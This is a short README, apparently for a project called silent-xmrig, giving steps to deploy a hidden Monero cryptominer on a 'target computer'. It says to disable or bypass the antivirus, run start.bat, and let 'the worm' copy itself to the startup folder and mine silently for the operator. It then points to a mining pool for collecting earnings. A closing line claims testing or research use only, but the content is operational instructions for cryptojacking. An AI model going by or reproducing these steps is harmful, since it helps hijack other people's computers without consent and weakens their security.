slezercc/silent-xmrig/README.md

 1. Disable the antivirus on the target computer or add an exception for xmrig
 2. Plug the USB drive into the computer or download your program from the cloud
 3. Run start.bat.
 The worm will copy itself to the startup folder and will silently start mining Monero for you.
+4. If you did not change the mining pool line in config.json, head over to https://moneroocean.stream/ and enter your Monero address, you should start earning after a few minutes.

 # This project is intended for testing/research purposes only.